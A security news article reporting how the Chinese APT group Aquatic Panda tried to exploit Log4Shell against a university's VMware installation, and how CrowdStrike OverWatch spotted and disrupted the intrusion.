Log4Shell exploit used by Chinese APT hackers targeting Universities

APT Aquatic Panda targets universities using Log4Shell exploit tools

Log4j vulnerability continue to create havocUniversities targeted by the Chinese ATP group exploiting Log4Shell flaw

Researchers disrupted the attempt to steal industrial intelligence and military secrets from academic institutions. CrowdStrike research team reported the activities of cybercriminals named Aquatic Panda.[1] A never-before-seen China hacker group leveraged the Apache Log4j logging library to access the targeted system. Once accessed, hackers can perform various activities and even reconnaissance and credential harvesting on the machine.

Criminals exploited the Log4Shell vulnerability that already managed to disrupt a good part of the world.[2] Attack involved a large undisclosed academic institution as a target and the researchers from CrowdStrike Falcon OverWatch managed to disrupt the threat actors trying to exploit the vulnerable VMware installation. The purpose of this attack – industrial espionage and data collection.[3]

The particular state-sponsored hacker group was active since 2020 and mainly focuses on intelligence collection and espionage attacks. The main targets of this APT are companies in the telecommunications, government, technology sectors. According to the reports about this attack, researchers informed the organization about the issue and an incident response protocol was started.

Close monitoring of suspicious activities help stop potential exploits

Various cybersecurity firms monitor activities online and look around for the possible Log4j logging library vulnerability found in Apache.[4] Due to the use of this particular flaw common products from Microsoft, Apple, Twitter, Cloudflare can be vulnerable to such attacks. Horizon service components can also be vulnerable to these exploits, according to recent reports.

The OverWatch research team tracked the malicious actors and their activity during the intrusion. This way details can be detected and provided for the security administrators, so the company can mitigate the attack. Aquatic Panda managed to use the active OS binaries to understand current privilege levels and system domain details to engage in a reconnaissance from the host.

The APT group also attempted to discover and stop the third-party endpoint detection and response service. Criminals downloaded additional scripts and executed commands to retrieve malware from their toolkit. Files with VBS extensions got obtained from remote infrastructure.

Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking.

Multiple credential harvesting attempts

Threat actors tried to collect various credentials and data by releasing the memory processes and using living-pff-the-land binaries. Data exfiltration preparations were the first steps before a particular track covering that involved eliminating executables and other files from various directories.

These vulnerabilities eventually were patched, and applications that were possibly vulnerable should be secured. Further actions from the Aquatic Panda on the host got stopped and the attack was not successful. However, this exploit is fairly new and will disrupt the operations for many months now. It is believed that the Log4Shell may help attackers to carry out various disruptive actions and continue with nefarious activities in the new year.[5]

The vulnerability is deemed extremely critical, and it can leave much of the internet at risk. The discussion around the flaw has been intense, and many organizations have been on edge. It is not expected to change in the next year. This potentially destructive vulnerability is the thing that no one wants to hear about because affected networks can create major consequences.

About the author
Gabriel E. Hall
Gabriel E. Hall - Passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.

Contact Gabriel E. Hall
About the company Esolutions